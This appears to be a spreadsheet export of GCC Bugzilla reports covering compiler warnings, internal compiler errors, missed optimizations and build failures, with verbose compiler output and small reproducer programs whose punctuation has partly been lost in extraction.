r154886 - warns
r154830 - silent
r153685 - silent
Full output:
$ /mnt/svn/gcc-trunk/binary-154953-lto/bin/g++ -std=c++0x -O2 -Wall -o tmp.o testcase-manual.ii -c -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-154953-lto/bin/g++
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-154953-lto/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-languages=cc++lto --prefix=/mnt/svn/gcc-trunk/binary-154953-lto
Thread model: posix
gcc version 4.5.0 20091203 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-std=c++0x' '-O2' '-Wall' '-o' 'tmp.o' '-c' '-v' '-shared-libgcc' '-mtune=generic'
 /mnt/svn/gcc-trunk/binary-154953-lto/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/cc1plus -fpreprocessed testcase-manual.ii -quiet -dumpbase testcase-manual.ii -mtune=generic -auxbase-strip tmp.o -O2 -Wall -std=c++0x -version -o /tmp/ccF5BU5B.s
GNU C++ (GCC) version 4.5.0 20091203 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.5.0 20091203 (experimental) GMP version 4.3.1 MPFR version 2.4.1-p5 MPC version 0.8
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.5.0 20091203 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.5.0 20091203 (experimental) GMP version 4.3.1 MPFR version 2.4.1-p5 MPC version 0.8
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 4b09d9924550b4f9676aafda3b16134c
testcase-manual.ii: In function A::~A(A** char*):
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
testcase-manual.ii:10:17: warning: ISRA.2 may be used uninitialized in this function
COLLECT_GCC_OPTIONS='-std=c++0x' '-O2' '-Wall' '-o' 'tmp.o' '-c' '-v' '-shared-libgcc' '-mtune=generic'
 as -V -Qy -o tmp.o /tmp/ccF5BU5B.s
GNU assembler version 2.20.51.0.3 (x86_64-pc-linux-gnu) using BFD version (Linux/GNU Binutils) 2.20.51.0.3.20091109
COMPILER_PATH=/mnt/svn/gcc-trunk/binary-154953-lto/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/:/mnt/svn/gcc-trunk/binary-154953-lto/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/:/mnt/svn/gcc-trunk/binary-154953-lto/libexec/gcc/x86_64-unknown-linux-gnu/:/mnt/svn/gcc-trunk/binary-154953-lto/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/:/mnt/svn/gcc-trunk/binary-154953-lto/lib/gcc/x86_64-unknown-linux-gnu/
LIBRARY_PATH=/mnt/svn/gcc-trunk/binary-154953-lto/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/:/mnt/svn/gcc-trunk/binary-154953-lto/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/opt/intel/Compiler/11.1/056/lib/intel64/:/mnt/svn/gcc-trunk/binary-154953-lto/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-std=c++0x' '-O2' '-Wall' '-o' 'tmp.o' '-c' '-v' '-shared-libgcc' '-mtune=generic'</t>
  </si>
  <si>
    <t>GCC-50766</t>
  </si>
  <si>
    <t>Binutils 2.22.51 rejects bmi2 pext operation with memory operands</t>
  </si>
  <si>
    <t>This program
#include 
#include 
int main()
{
  unsigned int x = 0x23593464
  unsigned int y = 0xF9494302
  unsigned int z = _pext_u32(x y)
  printf(%08X %08X %08X\n x y z)
}
when compiled with gcc 4.7 without optimizations produces a call to pext that looks like this:
        pext    %eax -16(%rbp) %eax
which binutils 2.22.51.20111017 rejects with
Error: operand size mismatch for `pext'
With -O2 gcc places all operands in registers and as will accept it.
Version:
$ g++-4.7.0 -v 
Using built-in specs.
COLLECT_GCC=/usr/local/bin/g++-4.7.0
COLLECT_LTO_WRAPPER=/usr/local/gcc-4.7.0-r179617/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-svn/configure --program-suffix=-4.7.0-r179617 --prefix=/usr/local/gcc-4.7.0-r179617 --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 20111006 (experimental) (GCC) ) and using 
$ as --version
GNU assembler (GNU Binutils) 2.22.51.20111017
Copyright 2011 Free Software Foundation Inc.
This program is free software you may redistribute it under the terms of
the GNU General Public License version 3 or later.
This program has absolutely no warranty.
This assembler was configured for a target of `x86_64-unknown-linux-gnu'.</t>
  </si>
  <si>
    <t>lloyd</t>
  </si>
  <si>
    <t>GCC-57052</t>
  </si>
  <si>
    <t>missed optimization with rotate and mask</t>
  </si>
  <si>
    <t>/* -m32 -O -S */
int
foo (unsigned int x int r)
{
  return ((x &gt; (32 - r))) 
}
results in:
foo:
	rlwnm 3340xffffffff
	rlwinm 3302431
	blr
Compiling the same code with -m32 -O -S -mlittle gives the properly optimized result of:
foo:
	rlwnm 3340xff
	blr
This is because many of the rs6000.md rotate/shift and mask patterns use subregs with wrong byte offsets.  eg. rotlsi3_internal7 the insn that ought to match here has (subreg:QI (rotate:SI ...) 0).  The 0 selects the most significant byte when BYTES_BIG_ENDIAN and the least significant when !BYTES_BIG_ENDIAN.
Fortunately combine doesn't seem to generate subregs for high parts so changing the testcase mask to 0xff000000 doesn't result in wrong code.
Annoyingly rotlsi3_internal4 would match here too if combine_simplify_rtx() didn't simplify (set (reg:SI) (and:SI () 255)) to use subregs.</t>
  </si>
  <si>
    <t>amodra</t>
  </si>
  <si>
    <t>GCC-19358</t>
  </si>
  <si>
    <t>[gfortran] Segfault with missing upper bound</t>
  </si>
  <si>
    <t>This triggers an ICE in a SPEC candidate benchmark: 
     1  MODULE foo 
     2  CONTAINS 
     3   SUBROUTINE bar(d i j) 
     4      IMPLICIT NONE 
     5      INTEGER INTENT(IN) :: i j 
     6      REAL DIMENSION(i:) INTENT(IN) :: d 
     7      REAL p 
     8      p = d(j) 
     9   END SUBROUTINE bar 
    10  END MODULE foo 
t.f90:3: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>GCC-8451</t>
  </si>
  <si>
    <t>altivec ice in gcc 3.2</t>
  </si>
  <si>
    <t xml:space="preserve"> /usr/local/vxworks/lib/gcc-lib/powerpc-wrs-vxworks/3.2/cpp0 -lang-c -v -isystem /usr/local/vxworks/lib/gcc-lib/include -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__vxworks -D__vxworks__ -D__vxworks -D__vxworks__ -Asystem=vxworks -Asystem=embedded -Acpu=powerpc -Amachine=powerpc -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_CALL_SYSV -D__BIG_ENDIAN__ -Amachine=bigendian -D_ARCH_PPC -D__ALTIVEC__ -DCPU_FAMILY=PPC -DCPU=PPC603 source/s.c -Wall s.i
ignoring nonexistent directory /usr/local/vxworks/lib/gcc-lib/include
GNU CPP version 3.2 (cpplib) (PowerPC System V.4)
ignoring nonexistent directory /usr/local/vxworks/powerpc-wrs-vxworks/include
#include ... search starts here:
#include  search starts here:
 /usr/local/vxworks/include
 /usr/local/vxworks/lib/gcc-lib/powerpc-wrs-vxworks/3.2/include
 /usr/local/vxworks/powerpc-wrs-vxworks/sys-include
End of search list.
 /usr/local/vxworks/lib/gcc-lib/powerpc-wrs-vxworks/3.2/cc1 -fpreprocessed s.i -quiet -dumpbase s.c -maltivec -mabi=altivec -O1 -Wall -version -o s.s
GNU CPP version 3.2 (cpplib) (PowerPC System V.4)
GNU C version 3.2 (powerpc-wrs-vxworks)
        compiled by GNU C version 3.1 20020420 (prerelease).
source/s.c: In function `gcc3_2_ice':
source/s.c:17: Internal compiler error in extract_bit_field at expmed.c:1147
Please submit a full bug report
Release:
gcc version 3.2: Darwin cross powerpc-wrs-vxworks
Environment:
Configured with: ../gcc-3.2/configure --prefix=/usr/local/vxworks --with-headers=/Tornado/target/h --enable-altivec --enable-languages=c --disable-shared --with-cpu=7400 --disable-multilib --target=powerpc-wrs-vxworks : (reconfigured) ../gcc-3.2/configure --prefix=/usr/local/vxworks --with-headers=/Tornado/target/h --enable-altivec --enable-languages=c --disable-shared --with-cpu=7400 --disable-multilib --with-gnu-as --with-gnu-ld --target=powerpc-wrs-vxworks
Thread model: vxworks
How-To-Repeat:
#include 
void gcc3_2_ice (const float a)
{
        const vector float small = (const vector float) {1.0e-6 1.0e-6 1.0e-6 1.0e-6}
        vector float b
        register vector float c
        register vector bool int d
        register vector float e
        * (float *) 
        c = vec_splat (b 0)
        d = vec_cmplt (e small)
        e = c
}</t>
  </si>
  <si>
    <t>hartwood</t>
  </si>
  <si>
    <t>GCC-13485</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] Generated files no longer get messages extracted</t>
  </si>
  <si>
    <t>With generated files no longer in the source directory the messages from
them no longer get extracted by exgettext for gcc.pot (unless old generated
files were lying around in the build directory).
A proper fix probably involves each Make-lang.in listing the generated files
in that language from which messages should be extracted (so that the
dependencies on those files which never were right can be correct) and
Makefile.in then passing the list of all those files (and options.c currently
handled specially) to exgettext.</t>
  </si>
  <si>
    <t>kcook</t>
  </si>
  <si>
    <t>GCC-56428</t>
  </si>
  <si>
    <t>[C++11] is not a constant expression when comparing non-type template argument to nullptr</t>
  </si>
  <si>
    <t>struct A { }
template
  struct Builder
  {
    static A build() { return A() }
  }
template
  A f()
  {
    return Builder::build()
  }
A g()
int main()
{
  f&lt;             // OK
  f()       // OK
  f&lt;    // ERROR
}
a.cc: In instantiation of 'A f() [with A (* F)() = f]':
a.cc:22:20:   required from here
a.cc:13:41: error: '(f != 0u)' is not a constant expression
     return Builder::build()
                                         ^
a.cc:13:41: note: in template argument for type 'bool'</t>
  </si>
  <si>
    <t>mpolacek</t>
  </si>
  <si>
    <t>redi</t>
  </si>
  <si>
    <t>GCC-9365</t>
  </si>
  <si>
    <t>[3.3 regression] [SH] segfault in gen_far_branch (config/sh/sh.c)</t>
  </si>
  <si>
    <t xml:space="preserve">	The compiler segfaults at the following place:
(gdb) bt
#0  0x2f422c in gen_far_branch (bp=0xefffe568)
    at /home/marcus/gcc-20030113/gcc/config/sh/sh.c:3228
#1  0x2f55a8 in split_branches (first=0x3ef400)
    at /home/marcus/gcc-20030113/gcc/config/sh/sh.c:4114
#2  0x2f49f0 in machine_dependent_reorg (first=0x48f420)
    at /home/marcus/gcc-20030113/gcc/config/sh/sh.c:3854
#3  0x2b9d0c in rest_of_compilation (decl=0x4d0280)
    at /home/marcus/gcc-20030113/gcc/toplev.c:3508
#4  0x58f94 in c_expand_body (fndecl=0x4d0280 nested_p=0 can_defer_p=3766272)
    at /home/marcus/gcc-20030113/gcc/c-decl.c:6525
#5  0x58b68 in finish_function (nested=0 can_defer_p=1)
    at /home/marcus/gcc-20030113/gcc/c-decl.c:6396
#6  0x38cbc in yyparse () at c-parse.y:403
#7  0x460fc in c_common_parse_file (set_yydebug=0)
    at /home/marcus/gcc-20030113/gcc/c-lex.c:159
#8  0x2b8364 in compile_file () at /home/marcus/gcc-20030113/gcc/toplev.c:2126
#9  0x2be260 in do_compile () at /home/marcus/gcc-20030113/gcc/toplev.c:5354
#10 0x2be328 in toplev_main (argc=17 argv=0xeffffa6c)
    at /home/marcus/gcc-20030113/gcc/toplev.c:5385
(gdb) list
3223        emit_barrier_after (jump)
3224      emit_label_after (bp-&gt;near_label insn)
3225      JUMP_LABEL (jump) = bp-&gt;far_label
3226      if (! invert_jump (insn label 1))
3227        abort ()
3228      (emit_insn_after
3229       (gen_stuff_delay_slot
3230        (GEN_INT (INSN_UID (XEXP (SET_SRC (PATTERN (jump)) 0)))
3231         GEN_INT (recog_memoized (insn) == CODE_FOR_branch_false))
3232        insn))
Release:
3.3 20030113 (prerelease)
Environment:
System: SunOS continuity 5.8 Generic_108528-10 sun4m sparc SUNWSPARCstation-10
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sh-unknown-elf
configured with: /home/marcus/gcc-20030113/configure --target=sh-elf --with-newlib --enable-languages=cc++
How-To-Repeat:
	Compile the following program with
	`sh-elf-gcc -v -O2 -fomit-frame-pointer -c foo.c' :
	---8&lt;--- foo.c ---8&lt;---
void foo(int n int *p)
{
  switch(n) {
   case 100: case 110: case 120: case 130: case 140:
   case 200: case 210: case 220: case 230: case 240:
   case 300: case 310: case 320: case 330: case 340:
   case 400: case 410: case 420: case 430: case 440:
   case 500: case 510: case 520: case 530: case 540:
   case 600: case 610: case 620: case 630: case 640:
   case 700: case 710: case 720: case 730: case 740:
   case 800: case 810: case 820: case 830: case 840:
   case 900: case 910: case 920: case 930: case 940:
     break
   default:
     *p = n
     break
  }
}
	---8&lt;---</t>
  </si>
  <si>
    <t>amylaar</t>
  </si>
  <si>
    <t>GCC-3192</t>
  </si>
  <si>
    <t>Can not split insn in TuxRacer 0.61 source</t>
  </si>
  <si>
    <t>While compiling the TuxRacer 
(http://sourceforge.net/projects/tuxracer) v.0.61 sources
during the make step GCC bombs with the following errors:
quadtree.cpp: In constructor `quadsquare::quadsquare(quadcornerdata*)':
quadtree.cpp:121: Could not split insn
(insn:TI 890 889 790 (parallel[
            (set (reg:SF 22 exmm1 [199])
                (if_then_else:SF (lt (reg:SF 22 exmm1 [199])
                        (reg/v:SF 21 exmm0 [143]))
                    (reg:SF 22 exmm1 [199])
                    (reg/v:SF 21 exmm0 [143])))
            (clobber (reg:CC 17 flags))
        ] ) 612 {*minsf_nonieee} (insn_list 416 (insn_list 889 (nil)))
    (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
quadtree.cpp:121: Internal compiler error in final_scan_insn at final.c:2911
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The following optimization options were enabled for C/C++
compiling:
	-msse -march=pentiumpro
Release:
gcc version 3.1 20010613 (experimental) i686-pc-linux-gnu
Environment:
CFLAGS=-msse -march=pentiumpro
CXXFLAGS=-msse -march=pentiumpro
System type: i686-pc-linux-gnu
Processor: Pentium III (Coppermine) -- 
	family 6 model 8 stepping 6
Kernel: 2.4.5
How-To-Repeat:
1) Download the sources from the TuxRacer Web site.
2) Untar and configure with this command line:
	CFLAGS=-msse -march=pentiumpro CXXFLAGS=-msse
		-march=pentiumpro ./configure
3) Compile as normal.  It should crash while compiling
quadtree.cpp.</t>
  </si>
  <si>
    <t>vogon_jeltz</t>
  </si>
  <si>
    <t>GCC-53973</t>
  </si>
  <si>
    <t>[x32] libjava failures</t>
  </si>
  <si>
    <t>As of revision 189483 there are following libjava failures
on Linux/x32:
FAIL: libjava.jar/TestClosureGC.jar execution - gij test
FAIL: libjava.jar/simple.jar output - gij test
FAIL: PR15133 output - gij test
FAIL: PR18116 output - gij test
FAIL: calls output - gij test
FAIL: directbuffer output - gij test
FAIL: final_method output - gij test
FAIL: findclass execution - gij test
FAIL: findclass2 output - gij test
FAIL: iface output - gij test
FAIL: init output - gij test
FAIL: invoke output - gij test
FAIL: jniutf execution - gij test
FAIL: martin execution - gij test
FAIL: noclass output - gij test
FAIL: overload output - gij test
FAIL: pr18278 execution - gij test
FAIL: pr23739 execution - gij test
FAIL: register output - gij test
FAIL: register2 output - gij test
FAIL: simple_int output - gij test
FAIL: throwit execution - gij test
FAIL: virtual output - gij test
FAIL: PR16923 output
FAIL: pr29812 execution - gij test
FAIL: getargssize output
FAIL: getlocalvartable output
FAIL: getstacktrace output
FAIL: Divide_1 output - source compiled test
FAIL: Divide_1 -findirect-dispatch output - source compiled test</t>
  </si>
  <si>
    <t>GCC-45544</t>
  </si>
  <si>
    <t>ICE: in sese_adjust_liveout_phis at sese.c:633</t>
  </si>
  <si>
    <t>Hi
Compiling libtorrent-0.12.6 using -fgraphite-identity ends up with an ICE.
Disabling that flag fixes the problem. The bail-out message is at the bottom of this report. The same compilation with exactly the same flags performed on host/target/build triplet x86_64-pc-linux-gnu does not show that error and compiles fine.
I am no regular submitter for bug reports and no expert with gcc.
If you need more info please tell I'll try to provide it.
For now I leave it with the .cc file and the .ii file.
/bin/sh ../../libtool --tag=CXX   --mode=compile i686-pc-linux-gnu-g++ -DHAVE_CONFIG_H -I. -I../.. -I. -I./.. -I../..   -v -save-temps -march=native -O2 -pipe -floop-interchange -floop-strip-mine -floop-block -fgraphite-identity -fvisibility-inlines-hidden -DNDEBUG -fvisibility=hidden   -I/usr/include/sigc++-2.0 -I/usr/lib/sigc++-2.0/include   -c -o dht_router.lo dht_router.cc
libtool: compile:  i686-pc-linux-gnu-g++ -DHAVE_CONFIG_H -I. -I../.. -I. -I./.. -I../.. -v -save-temps -march=native -O2 -pipe -floop-interchange -floop-strip-mine -floop-block -fgraphite-identity -fvisibility-inlines-hidden -DNDEBUG -fvisibility=hidden -I/usr/include/sigc++-2.0 -I/usr/lib/sigc++-2.0/include -c dht_router.cc  -fPIC -DPIC -o .libs/dht_router.o
i686-pc-linux-gnu-g++: warning: -pipe ignored because -save-temps specified
Using built-in specs.
COLLECT_GCC=/usr/i686-pc-linux-gnu/gcc-bin/4.5.1/i686-pc-linux-gnu-g++
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/i686-pc-linux-gnu/4.5.1/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.5.1/work/gcc-4.5.1/configure --prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/4.5.1 --includedir=/usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include --datadir=/usr/share/gcc-data/i686-pc-linux-gnu/4.5.1 --mandir=/usr/share/gcc-data/i686-pc-linux-gnu/4.5.1/man --infodir=/usr/share/gcc-data/i686-pc-linux-gnu/4.5.1/info --with-gxx-include-dir=/usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include/g++-v4 --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --disable-altivec --disable-fixed-point --with-ppl --with-cloog --disable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-secureplt --disable-multilib --enable-libmudflap --disable-libssp --enable-libgomp --enable-cld --with-python-dir=/share/gcc-data/i686-pc-linux-gnu/4.5.1/python --enable-checking=release --disable-libgcj --with-arch=i686 --enable-languages=cc++fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.5.1 p1.0 pie-0.4.5'
Thread model: posix
gcc version 4.5.1 (Gentoo 4.5.1 p1.0 pie-0.4.5) 
COLLECT_GCC_OPTIONS='-DHAVE_CONFIG_H' '-I.' '-I../..' '-I.' '-I./..' '-I../..' '-v' '-save-temps'  '-O2' '-pipe' '-floop-interchange' '-floop-strip-mine' '-floop-block' '-fgraphite-identity' '-fvisibility-inlines-hidden' '-DNDEBUG' '-fvisibility=hidden' '-I/usr/include/sigc++-2.0' '-I/usr/lib/sigc++-2.0/include' '-c' '-fPIC' '-DPIC' '-o' '.libs/dht_router.o' '-shared-libgcc'
 /usr/libexec/gcc/i686-pc-linux-gnu/4.5.1/cc1plus -E -quiet -v -I. -I../.. -I. -I./.. -I../.. -I/usr/include/sigc++-2.0 -I/usr/lib/sigc++-2.0/include -D_GNU_SOURCE -DHAVE_CONFIG_H -DNDEBUG -DPIC dht_router.cc -D_FORTIFY_SOURCE=2 -march=pentium-m --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=2048 -mtune=generic -floop-interchange -floop-strip-mine -floop-block -fgraphite-identity -fvisibility-inlines-hidden -fvisibility=hidden -fPIC -O2 -fpch-preprocess -o dht_router.ii
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/i686-pc-linux-gnu/4.5.1/../../../../i686-pc-linux-gnu/include
ignoring duplicate directory .
ignoring duplicate directory ../..
#include ... search starts here:
#include  search starts here:
 .
 ../..
 ./..
 /usr/include/sigc++-2.0
 /usr/lib/sigc++-2.0/include
 /usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include/g++-v4
 /usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include/g++-v4/i686-pc-linux-gnu
 /usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include/g++-v4/backward
 /usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include
 /usr/lib/gcc/i686-pc-linux-gnu/4.5.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-DHAVE_CONFIG_H' '-I.' '-I../..' '-I.' '-I./..' '-I../..' '-v' '-save-temps'  '-O2' '-pipe' '-floop-interchange' '-floop-strip-mine' '-floop-block' '-fgraphite-identity' '-fvisibility-inlines-hidden' '-DNDEBUG' '-fvisibility=hidden' '-I/usr/include/sigc++-2.0' '-I/usr/lib/sigc++-2.0/include' '-c' '-fPIC' '-DPIC' '-o' '.libs/dht_router.o' '-shared-libgcc'
 /usr/libexec/gcc/i686-pc-linux-gnu/4.5.1/cc1plus -fpreprocessed dht_router.ii -march=pentium-m --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=2048 -mtune=generic -quiet -dumpbase dht_router.cc -auxbase-strip .libs/dht_router.o -O2 -version -floop-interchange -floop-strip-mine -floop-block -fgraphite-identity -fvisibility-inlines-hidden -fvisibility=hidden -fPIC -o dht_router.s
GNU C++ (Gentoo 4.5.1 p1.0 pie-0.4.5) version 4.5.1 (i686-pc-linux-gnu)
        compiled by GNU C version 4.5.1 GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (Gentoo 4.5.1 p1.0 pie-0.4.5) version 4.5.1 (i686-pc-linux-gnu)
        compiled by GNU C version 4.5.1 GMP version 4.3.2 MPFR version 2.4.2-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 624da71fb975f806d657ba17ec1d999e
dht_router.cc: In member function 'void torrent::DhtRouter::bootstrap()':
dht_router.cc:626:1: internal compiler error: in sese_adjust_liveout_phis at sese.c:633
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>shannemann</t>
  </si>
  <si>
    <t>GCC-29744</t>
  </si>
  <si>
    <t>[Regression] Type renaming crashes gfortran with excessive memory usage</t>
  </si>
  <si>
    <t>Hi
the code sample from PR 19362 crashes for me after eating all
main memory.  I checked that a copy of gfortran from 20060710
still works while the copy from 20060904 and all later versions
crash.
The problems appears to be related to the renaming of the derived
type from the included module.  Maybe it's some infinite recursion?
(For testers: I suggest to set a suitable ulimit e.g.
ulimit -v 50000 before calling gfortran on this example
to avoid thrashing).</t>
  </si>
  <si>
    <t>pault</t>
  </si>
  <si>
    <t>anlauf</t>
  </si>
  <si>
    <t>GCC-54061</t>
  </si>
  <si>
    <t>[4.8 Regression] gcc.c-torture/compile/mipscop-*.c ICEs with -g</t>
  </si>
  <si>
    <t>After http://gcc.gnu.org/bugzilla/show_bug.cgi?id=52857#c6 this testcase started to ICE.  
/home/apinski/src/gcc-fsf/local/gcc/gcc/testsuite/gcc.c-torture/compile/mipscop-1.c:12:1: internal compiler error: in dbx_reg_number at dwarf2out.c:9734</t>
  </si>
  <si>
    <t>pinskia</t>
  </si>
  <si>
    <t>GCC-6208</t>
  </si>
  <si>
    <t>pending</t>
  </si>
  <si>
    <t>Re: PR c++/5504: Optimization breaks wei-ku-1 from blitz</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; For 3.1 one option would be to go back to doing destructor cleanups only
 &gt; on the normal flow path this would break EH semantics again for this
 &gt; case but that would not be a regression and I don't think I've ever seen
 &gt; a bug report about it in past releases.
 I think this is the most practical solution under the circumstances.
 At some point we clearly need to explore the other alternatives you
 suggest.
 Thanks
 --
 Mark Mitchell                   mark@codesourcery.com
 CodeSourcery LLC               http://www.codesourcery.com
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-32482</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE verify_ssa failed</t>
  </si>
  <si>
    <t>Hello
there seems to be a problem compiling the attached source file with i686-pc-linux-gnu-gcc:
  gcc -m32 -Wp-MDmm/.slab.o.d  -nostdinc -isystem /home/mstein/host-gcc/trunk-2007-06-24/bin/../lib/gcc/i686-pc-linux-gnu/4.3.0/include -D__KERNEL__ -Iinclude  -include include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Os -pipe -msoft-float -mregparm=3 -mpreferred-stack-boundary=2  -march=i686 -mtune=generic -ffreestanding -maccumulate-outgoing-args -DCONFIG_AS_CFI=1  -Iinclude/asm-i386/mach-default -fno-omit-frame-pointer -fno-optimize-sibling-calls -g  -fno-stack-protector -Wdeclaration-after-statement -Wno-pointer-sign    -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(slab)  -DKBUILD_MODNAME=KBUILD_STR(slab) -c -o mm/.tmp_slab.o mm/slab.c
mm/slab.c: In function '__cache_shrink':
mm/slab.c:2476: error: expected an SSA_NAME object
mm/slab.c:2476: error: in statement
# VUSE  { SFT.1676 }
D.24655_100 = node_online_map.bits[0]
mm/slab.c:2476: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
host gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /home/mstein/svn/trunk/configure --enable-languages=c --disable-nls --prefix=/n/07/mstein/host-gcc/trunk-2007-06-24
Thread model: posix
gcc version 4.3.0 20070623 (experimental)
Tested revion: 125975</t>
  </si>
  <si>
    <t>mstein.lists</t>
  </si>
  <si>
    <t>GCC-55674</t>
  </si>
  <si>
    <t>gcov-profile</t>
  </si>
  <si>
    <t>[4.8 Regression] &gt;20%  size increase of lto/pgo binaries since r193747</t>
  </si>
  <si>
    <t>See http://gcc.gnu.org/bugzilla/show_bug.cgi?id=45375#c144 onwards.
Binaries build with -flto -fprofile-use increased more than 20% in size
since revision 193747 went in.
libxul's size increased ~20%:
34MB before 42MB now.
This also happens for simpler testcases e.g tramp3d-v4.cpp (30% increase):
0.9MB before  1.3M now.
Setting --param hot-bb-count-ws-permille to lower values doesn't help.</t>
  </si>
  <si>
    <t>octoploid</t>
  </si>
  <si>
    <t>GCC-1455</t>
  </si>
  <si>
    <t>gcjh barfs on legal java name usage</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: Java Gnats Server  
Cc:  
Subject: gcj/75
Date: 04 Nov 1999 22:20:24 -0700
 Thanks for the report.  This is a known bug.  The problem is that C++
 can't have a method and a field with the same name.
 For now the workaround is don't do that.
 Later we'd like to change the C++ compiler so we can have an
 attribute which will effectively rename one of the fields.  This
 attribute will also be useful when we want to represent fields with
 non-ASCII characters in their names (there might be another way to do
 that already but I haven't studied UCN's enough to know if they are
 the right solution for us).
 Tom
</t>
  </si>
  <si>
    <t>apbianco</t>
  </si>
  <si>
    <t>ashe</t>
  </si>
  <si>
    <t>GCC-44444</t>
  </si>
  <si>
    <t>[4.6 Regression] -Wunused-but-set-variable problem with field references</t>
  </si>
  <si>
    <t>struct S
{
  const int 
  const int 
  S (const int &amp;a const int &amp;b) : u(a) v(b) { }
}
bool
f1 ()
{
  bool t = false
  S z = S (1 2)
  t |= z.u == 1
  t |= z.v == 2
  return t
}
void
f2 ()
{
  S z = S (1 2)
  z.u
}
int i
void
f3 ()
{
  S z = S (1 2)
  i++ z.u
}
warns with -Wunused when it shouldn't (except for no effect warnings).</t>
  </si>
  <si>
    <t>GCC-9232</t>
  </si>
  <si>
    <t>Re: gcc/9170</t>
  </si>
  <si>
    <t xml:space="preserve"> On Wed 2003-01-08 at 03:06 Andrew Haley wrote:
 &gt; Follow the How-To-Repeat steps from PR 8138. 
 &gt; 
 &gt; This does not work bacuse it references a link
 &gt; 
 &gt;  http://www.megacz.com/src.tgz
 &gt; 
 &gt; that is broken.
 &gt; 
 &gt; Unless someone can find me a copy of this file and put it somewhere it
 &gt; will be safe I'll have to close this bug as unreproducible.
 I just downloaded it a few days ago and have it at home.  I'll send you
 a pointer tonight.
 Thanks
 AG
Release:
unknown</t>
  </si>
  <si>
    <t>green</t>
  </si>
  <si>
    <t>GCC-47176</t>
  </si>
  <si>
    <t>go</t>
  </si>
  <si>
    <t>libgo doesn't compile if libunicode is installed</t>
  </si>
  <si>
    <t>Trying to build gcc with go support on a system that has libunicode (http://libunicode.sf.net/) installed results in
libtool: compile:  /usr/src/ark/BUILD/gcc-4.6.0/build/./gcc/gccgo -B/usr/src/ark/BUILD/gcc-4.6.0/build/./gcc/ -B/usr/x86_64-unknown-linux-gnu/bin/ -B/usr/x86_64-unknown-linux-gnu/lib/ -isystem /usr/x86_64-unknown-linux-gnu/include -isystem /usr/x86_64-unknown-linux-gnu/sys-include -minline-all-stringops -O2 -g -c -fgo-prefix=libgo_bytes ../../../libgo/go/bytes/buffer.go ../../../libgo/go/bytes/bytes.go ../../../libgo/go/bytes/bytes_decl.go  -fPIC -o bytes/.libs/bytes.o
